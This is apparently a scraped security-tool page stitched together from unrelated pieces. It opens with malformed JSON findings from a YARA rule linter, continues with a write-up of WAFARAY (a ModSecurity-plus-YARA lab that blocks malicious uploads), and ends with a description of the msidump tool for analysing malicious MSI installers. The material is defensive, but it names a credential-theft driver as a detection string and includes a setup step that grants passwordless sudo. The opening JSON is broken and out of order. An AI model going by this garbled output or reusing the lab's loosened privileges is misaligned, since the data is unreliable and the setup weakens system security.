{ "rule": "Demo_Rule_6_Condition_Short_Byte_At_Pos", "id": "PA2", "issue": "The rule contains a string that turns out to be a very short atom, which could cause a reduced performance of the complete rule set or increased memory usage.", "element": { "name": "$mz", "value": "{ 4d 5a }", "type": "byte" }, "level": "warning", "type": "performance", "recommendation": "Try to avoid using such short atoms, by e.g. adding a few more bytes to the beginning or the end (e.g. add a binary 0 in front or a space after the string). Every additional byte helps." }, { "rule": "Demo_Rule_6_Condition_Short_Byte_At_Pos", "id": "SM3", "issue": "The rule uses a string with the modifier 'fullword' but it starts and ends with two backslashes and thus the modifier could lead to a dysfunctional rule.", "element": { "name": "$s1", "value": "\\\\Section\\\\in\\\\Path\\\\", "type": "text", "modifiers": [ "ascii", "fullword" ] }, "level": "warning", "type": "logic", "recommendation": "Remove the 'fullword' modifier" } ]" dir="auto">
"rule": "Demo_Rule_1_Fullword_PDB",
"id": "SM1",
"issue": "The rule uses a PDB string with the modifier 'wide'. PDB strings are always included as ASCII strings. The 'wide' keyword is unneeded.",
"element": {
"name": "$s1",
"value": "\\\\i386\\\\mimidrv.pdb",
"type": "text",
"modifiers": [
"level": "info",
"type": "logic",
"recommendation": "Remove the 'wide' modifier"
"rule": "Demo_Rule_1_Fullword_PDB",
"id": "SM2",
"issue": "The rule uses a PDB string with the modifier 'fullword' but it starts with two backslashes and thus the modifier could lead to a dysfunctional rule.",
"element": {
"name": " $s1",
"value": "\\\\i386\\\\mimidrv.pdb",
"type": "text",
"modifiers": [
"level": "warning",
"type": "logic",
"recommendation": "Remove the 'fullword' modifier"
"rule": "Demo_Rule_2_Short_Atom",
"id": "PA2",
"issue": "The rule contains a string that turns out to be a very short atom, which could cause a reduced performance of the complete rule set or increased memory usage.",
"element": {
"name": "$s1",
"value": "{ 01 02 03 }",
"type": "byte"
"level": "warning",
"type": "performance",
"recommendation": "Try to avoid using such short atoms, by e.g. adding a few more bytes to the beginning or the end (e.g. add a binary 0 in front or a space after the string). Every additional byte helps."
"rule": "Demo_Rule_3_Fullword_FilePath_Section",
"id": "SM3",
"issue": "The rule uses a string with the modifier 'fullword' but it starts and ends with two backslashes and thus the modifier could lead to a dysfunctional rule.",
"element": {
"name": "$s1",
"value": "\\\\ZombieBoy\\\\",
"type": "text",
"modifiers": [
"level": "warning",
"type": "logic",
"recommendation": "Remove the 'fullword' modifier"
"rule": "Demo_Rule_4_Condition_Never_Matches",
"id": "CE1",
"issue": "The rule uses a condition that will never match",
"element": {
"condition_segment": "2 of",
"num_of_strings": 1
"level": "error",
"type": "logic",
"recommendation": "Fix the condition"
"rule": "Demo_Rule_5_Condition_Short_String_At_Pos",
"id": "PA1",
"issue": "This rule looks for a short string at a particular position. A short string represents a short atom and could be rewritten to an expression using uint(x) at position.",
"element": {
"condition_segment": "$mz at 0",
"string": "$mz",
"value": "MZ"
"level": "warning",
"type": "performance",
"recommendation": ""
"rule": "Demo_Rule_5_Condition_Short_String_At_Pos",
"id": "PA2",
"issue": "The rule contains a string that turns out to be a very short atom, which could cause a reduced performance of the complete rule set or increased memory usage.",< br/> "element": {
"name": "$mz",
"value": "MZ",
"type": "text",
"modifiers": [
"level": "warning",
"type": "performance",
"recommendation": "Try to avoid using such short atoms, by e.g. adding a few more bytes to the beginning or the end (e.g. add a binary 0 in front or a space after the string). Every additional byte helps."
"rule": "Demo_Rule_6_Condition_Short_Byte_At_Pos",
"id": "PA1",
"issue": "This rule looks for a short string at a particular position. A short string represents a short atom and could be rewritten to an expression using uint(x) at position.",
"element": {
"condition_segment": "$mz at 0",
"string": "$mz",
"value": "{ 4d 5a }"
"level": "warning",
"type": "performance",
"recommendation": ""
"rule": "Demo_Rule_6_Condition_Short_Byte_At_Pos",
"id": "PA2",
"issue": "The rule contains a string that turns out to be a very short atom, which could cause a reduced performance of the complete rule set or increased memory usage.",
"element": {
"name": "$mz",
"value": "{ 4d 5a }",
"type": "byte"
"level": "warning",
"type": "performance",
"recommendation": "Try to avoid using such short atoms, by e.g. adding a few more bytes to the beginning or the end (e.g. add a binary 0 in front or a space after the string). Every additional byte helps."
"rule": "Demo_Rule_6_Condition_Short_Byte_At_Pos",
"id": "SM3",
"issue": "The rule uses a string with the modifier 'fullword' but it starts and ends with two backsla shes and thus the modifier could lead to a dysfunctional rule.",
"element": {
"name": "$s1",
"value": "\\\\Section\\\\in\\\\Path\\\\",
"type": "text",
"modifiers": [
"level": "warning",
"type": "logic",
"recommendation": "Remove the 'fullword' modifier"


Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)

By: Zion3R

WAFARAY is a LAB deployment based on Debian 11.3.0 (stable) x64 made and cooked between two main ingredients WAF + YARA to detect malicious files (e.g. webshells, virus, malware, binaries) typically through web functions (upload files).


In essence, the main idea came to use WAF + YARA (YARA right-to-left = ARAY) to detect malicious files at the WAF level before WAF can forward them to the backend e.g. files uploaded through web functions see:

When a web page allows uploading files, most of the WAFs are not inspecting files before sending them to the backend. Implementing WAF + YARA could provide malware detection before WAF forwards the files to the backend.

Do malware detection through WAF?

Yes, one solution is to use ModSecurity + Clamav, most of the pages call ClamAV as a process and not as a daemon, in this case, analysing a file could take more than 50 seconds per file. See this resource:

Do malware detection through WAF + YARA?

:-( A few clues here Black Hat Asia 2019 please continue reading and see below our quick LAB deployment.

WAFARAY: how does it work ?

Basically, It is a quick deployment (1) with pre-compiled and ready-to-use YARA rules via ModSecurity (WAF) using a custom rule; (2) this custom rule will perform an inspection and detection of the files that might contain malicious code, (3) typically web functions (upload files) if the file is suspicious will reject them receiving a 403 code Forbidden by ModSecurity.

βœ”οΈThe compiles all the yara rules. (Python3 code)
βœ”οΈThe test.conf is a virtual host that contains the mod security rules. (ModSecurity Code)
βœ”οΈModSecurity rules calls the in order to inspect the file that is trying to upload. (Python3 code)
βœ”οΈYara returns two options 1 (200 OK) or 0 (403 Forbidden)

Main Paths:

  • Yara Compiled rules: /YaraRules/Compiled
  • Yara Default rules: /YaraRules/rules
  • Yara Scripts: /YaraRules/YaraScripts
  • Apache vhosts: /etc/apache2/sites-enabled
  • Temporal Files: /temporal


  • Blueteamers: Rule enforcement, best alerting, malware detection on files uploaded through web functions.
  • Redteamers/pentesters: GreyBox scope , upload and bypass with a malicious file, rule enforcement.
  • Security Officers: Keep alerting, threat hunting.
  • SOC: Best monitoring about malicious files.
  • CERT: Malware Analysis, Determine new IOC.

Building Detection Lab

The Proof of Concept is based on Debian 11.3.0 (stable) x64 OS system, OWASP CRC v3.3.2 and Yara 4.0.5, you will find the automatic installation script here and an optional manual installation guide can be found here: manual_instructions.txt also a PHP page has been created as a "mock" to observe the interaction and detection of malicious files using WAF + YARA.

Installation (recommended) with shell scripts

βœ”οΈStep 2: Deploy using VMware or VirtualBox
βœ”οΈStep 3: Once installed, please follow the instructions below:
alex@waf-labs:~$ su root 

# Remember to change YOUR_USER by your username (e.g waf)
root@waf-labs:/home/alex# sed -i 's/^\(# User privi.*\)/\1\nalex ALL=(ALL) NOPASSWD:ALL/g' /etc/sudoers
root@waf-labs:/home/alex# exit
alex@waf-labs:~$ sudo sed -i 's/^\(deb cdrom.*\)/#\1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb\-src http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ echo -ne "\n\ndeb bullseye main\ndeb-src bullseye main\n" | sudo tee -a /etc/apt/sources.list
alex@waf-labs:~$ sudo apt-get update
alex@waf-labs:~$ sudo apt-get install sudo -y
alex@waf-labs:~$ sudo apt-get install git vim dos2unix net-tools -y
alex@waf-labs:~$ git clone$ cd wafaray
alex@waf-labs:~$ dos2unix
alex@waf-labs:~$ chmod +x
alex@waf-labs:~$ sudo ./ >> log_install.log

# Test your LAB environment
alex@waf-labs:~$ firefox localhost:8080/upload.php

Yara Rules

Once the Yara Rules were downloaded and compiled.

It is similar to when you deploy ModSecurity, you need to customize what kind of rule you need to apply. The following log is an example of when the Web Application Firewall + Yara detected a malicious file, in this case, eicar was detected.

Message: Access denied with code 403 (phase 2). File "/temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA" rejected by 
the approver script "/YaraRules/YaraScripts/": 0 SUSPECTED [YaraSignature: eicar]
[file "/etc/apache2/sites-enabled/test.conf"] [line "56"] [id "500002"]
[msg "Suspected File -> /temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA - URI: /upload.php"]

Testing WAFARAY... voilΓ ...

Stop / Start ModSecurity

$ sudo service apache2 stop
$ sudo service apache2 start

Apache Logs

$ cd /var/log
$ sudo tail -f apache2/test_access.log apache2/test_audit.log apache2/test_error.log


Be careful about your test. The following demos were tested on isolated virtual machines.

Demo 1 - EICAR

A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware: NOT EXECUTE THE FILE.

Demo 2 - WebShell.php

For this demo, we disable the rule 933110 - PHP Inject Attack to validate Yara Rules. A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of WebShell PHP: NOT EXECUTE THE FILE.

Demo 3 - Malware Bazaar (RecordBreaker) Published: 2022-08-13

A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware Bazaar (RecordBreaker): NOT EXECUTE THE FILE.

YARA Rules sources

In case that you want to download more yara rules, you can see the following repositories:


Roadmap until next release

  • Malware Hash Database (MLDBM). The Database stores the MD5 or SHA1 that files were detected as suspicious.
  • To be tested CRS Modsecurity v.3.3.3 new rules
  • ModSecurity rules improvement to malware detection with Database.
  • To be created blacklist and whitelist related to MD5 or SHA1.
  • To be tested, run in background if the Yara analysis takes more than 3 seconds.
  • To be tested, new payloads, example: Powershell Obfuscasted (WebShells)
  • Remarks for live enviroments. (WAF AWS, WAF GCP, ...)


Alex Hernandez aka (@_alt3kx_)
Jesus Huerta aka @mindhack03d


Israel Zeron Medina aka @spk085

MSI Dump - A Tool That Analyzes Malicious MSI Installation Packages, Extracts Files, Streams, Binary Data And Incorporates YARA Scanner

MSI Dump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner.

On Macro-enabled Office documents we can quickly use oletools mraptor to determine whether document is malicious. If we want to dissect it further, we could bring in oletools olevba or oledump.

To dissect malicious MSI files, so far we had only one, but reliable and trustworthy lessmsi. However, lessmsi doesn't implement features I was looking for:

  • quick triage
  • Binary data extraction
  • YARA scanning

Hence this is where msidump comes into play.


This tool helps in quick triages as well as detailed examinations of malicious MSIs corpora. It lets us:

  • Quickly determine whether file is suspicious or not.
  • List all MSI tables as well as dump specific records
  • Extract Binary data, all files from CABs, scripts from CustomActions
  • scan all inner data and records with YARA rules
  • Uses file/MIME type deduction to determine inner data type

It was created as a companion tool to the blog post I released here:


  • The program is still in an early alpha version, things are expected to break and triaging/parsing logic to change
  • Due to this tool heavy relience on Win32 COM WindowsInstaller.Installer interfaces, currently it is not possible to support native Linux platforms. Maybe wine python could help, but haven't tried that yet.

Use Cases

  1. Perform quick triage of a suspicious MSI augmented with YARA rule:
cmd> python evil.msi -y rules.yara

Here we can see that input MSI is injected with suspicious VBScript and contains numerous executables in it.

  1. Now we want to take a closer look at this VBScript by extracting only that record.

We see from the triage table that it was present in Binary table. Lets get him:

python putty-backdoored.msi -l binary -i UBXtHArj

We can specify which to record dump either by its name/ID or its index number (here that would be 7).

Lets have a look at another example. This time there is executable stored in Binary table that will be executed during installation:

To extract that file we're gonna go with

python evil2.msi -x binary -i lmskBju -O extracted


  • -x binary tells to extract contents of Binary table
  • -i lmskBju specifies which record exactly to extract
  • -O extracted sets output directory

For the best output experience, run the tool on a maximized console window or redirect output to file:

python [...] -o analysis.log

Full Usage

PS D:\> python .\ --help
-h, --help show this help message and exit

Required arguments:
infile Input MSI file (or directory) for analysis.

-q, --quiet Surpress banner and unnecessary information. In triage mode, will display only verdict.
-v, --verbose Verbose mode.
-d, --debug Debug mode.
-N, --nocolor Dont use colors in text output.
-n PRINT_LEN, --print-len PRINT_LEN
When previewing data - how many bytes to include in preview/hexdump. Default: 128
-f {text,json,csv}, --format {text,json,csv}
Output format: text, json, csv. Default: text
-o path, --outfile path
Redirect program output to this file.
-m, --mime When sniffing inner data type, report MIME types

Analysis Modes:
-l what, --list what List specific table contents. See help message to learn what can be listed.
-x what, --extract what
Extract data from MSI. For what can be extracted, refer to help message.

Analysis Specific options:
-i number|name, --record number|name
Can be a number or name. In --list mode, specifies which record to dump/display entirely. In --extract mode dumps only this particular record to --outdir
-O path, --outdir path
When --extract mode is used, specifies output location where to extract data.
-y path, --yara path Path to YARA rule/directory with rules. YARA will be matched against Binary data, streams and inner files


- What can be listed:
--list CustomAction - Specific table
--lis t Registry,File - List multiple tables
--list stats - Print MSI database statistics
--list all - All tables and their contents
--list olestream - Prints all OLE streams & storages.
To display CABs embedded in MSI try: --list _Streams
--list cabs - Lists embedded CAB files
--list binary - Lists binary data embedded in MSI for its own purposes.
That typically includes EXEs, DLLs, VBS/JS scripts, etc

- What can be extracted:
--extract all - Extracts Binary data, all files from CABs, scripts from CustomActions
--extract binary - Extracts Binary data
--extract files - Extracts files
--extract cabs - Extracts cabinets
--extract scripts - Extrac ts scripts



  • Triaging logic is still a bit flakey, I'm not very proud of it. Hence it will be subject for constant redesigns and further ramifications
  • Test it on a wider test samples corpora
  • Add support for input ZIP archives with passwords
  • Add support for ingesting entire directory full of YARA rules instead of working with a single file only
  • Currently, the tool matches malicious CustomAction Types based on assessing their numbers, which is prone to being evaded.
    • It needs to be reworked to properly consume Type number and decompose it onto flags

Tool's Name

Apparently when naming my tool, I didn't think on checking whether it was already taken. There is another tool named msidump being part of msitools GNU package:

Show Support

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you!

Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at]>
